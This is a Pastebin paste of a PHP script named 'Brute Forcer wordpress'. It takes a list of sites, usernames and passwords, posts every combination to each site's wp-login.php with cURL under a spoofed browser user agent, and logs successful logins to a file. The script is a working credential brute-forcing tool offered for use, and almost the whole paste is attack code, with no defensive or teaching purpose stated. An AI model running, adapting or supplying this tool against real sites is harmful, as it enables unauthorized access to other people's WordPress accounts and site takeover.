Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*
- Brute Forcer:
- */
- if (!extension_loaded('curl')) die("cURL extension required\n");
- error_reporting(0);
- set_time_limit(0);
- print_r("\n
- .-..-. .-..-. .--. .----. .--. .----.
- : `' : : :' ; : ,. : `-- ;: ,. :: .--'
- : .. :.--. : ' .--. .--. : :: : .--. .---. .' ' : :: :`. `.
- : :; :: ..'_ : :.`.: ..'' .; :: :; :' .; :`-'_.' _ _`,`.: :; :.-`, :
- :_;:_;:_; :_;:_;:_;:_; `.__.'`.__.'`.__.'`.___;:_;`.__.'`.__.'`.__.'
- Brute Forcer wordpress
- \n\n
- \n[*] list site (1/3) :");
- $file_host = stdin();
- echo "\n\n[*] list user (2/3) :";
- $file_user = stdin();
- echo "\n\n[*] list pass (2/3) :";
- $file_pass = stdin();
- $wp_crack = new wp_cracker();
- $crack = $wp_crack->cracker($file_host,$file_user,$file_pass);
- if($crack){die('# END Brute Forcer ');}
- class wp_cracker{
- public function cracker($file_host,$file_user,$file_pass){
- $list_host = file_get_contents($file_host) or die ("\n WTF list host not found ?");
- $list_user = file_get_contents($file_user) or die (" \n WTF list user not found ? \n");
- $list_pass = file_get_contents($file_pass) or die (" \n WTF list pass not found ? \n");
- $exp_host = explode("\n",$list_host);
- $exp_user = explode("\n",$list_user);
- $exp_pass = explode("\n",$list_pass);
- $c_host = count($exp_host);
- $c_user = count($exp_user);
- $c_pass = count($exp_pass);
- echo "
- |================================================= +
- | Host : $file_host - ($c_host)
- |
- | Username : $file_user - ($c_user)
- |
- | Password : $file_pass - ($c_pass)
- |
- | Start Brute Forcer > > >
- |================================================= +
- \n";
- foreach ($exp_host as $host){
- $host = str_replace('http://','',trim($host));
- $get = get_headers("http://$host/wp-login.php");
- if (!preg_match("/200 OK/",$get[0])){
- continue;
- flush();
- }
- foreach($exp_user as $user) {
- flush();
- foreach($exp_pass as $pass){
- flush();
- $host = trim($host);
- $user = trim($user);
- $pass = trim($pass);
- echo "Testing -> $host:$user:$pass \n";
- $login = $this->login($host,$user,$pass);
- if($login){echo "\n [+] Found : $host:$user:$pass \n\n";
- $this->save($host,$user,$pass);
- flush();
- }else{continue;}
- ob_clear ;
- flush();
- }
- ob_clear ;
- flush();
- }
- ob_clear;
- flush();
- }
- return true;
- }
- private function login($host,$user,$pass){
- $curl = curl_init();
- curl_setopt($curl, CURLOPT_POST, 1);
- curl_setopt($curl, CURLOPT_POSTFIELDS,"log=$user&pwd=$pass&rememberme=forever&wp-submit=Log In&testcookie=1");
- curl_setopt($curl, CURLOPT_URL,"http://".$host."/wp-login.php");
- curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl, CURLOPT_HEADER,0);
- curl_setopt($curl, CURLOPT_VERBOSE,0);
- curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)');
- curl_setopt($curl, CURLOPT_COOKIEJAR,"COOKIE.txt");
- curl_setopt($curl, CURLOPT_COOKIEFILE,"COOKIE.txt");
- $ex = curl_exec($curl);
- if($ex){
- if(!preg_match('/ERROR/',$ex)){
- curl_close($curl);
- return true;
- }
- }
- curl_close($curl);
- return false;
- }
- private function save($host,$user,$pass){
- $f = fopen('wp.txt','ab');
- $w = fwrite($f,"[$host] - [$user] - [$pass) \n");
- if($w){return true;}
- }
- }
- function stdin(){
- $fp = fopen("php://stdin","r");
- $line = trim(fgets($fp));
- fclose($fp);
- return $line;
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement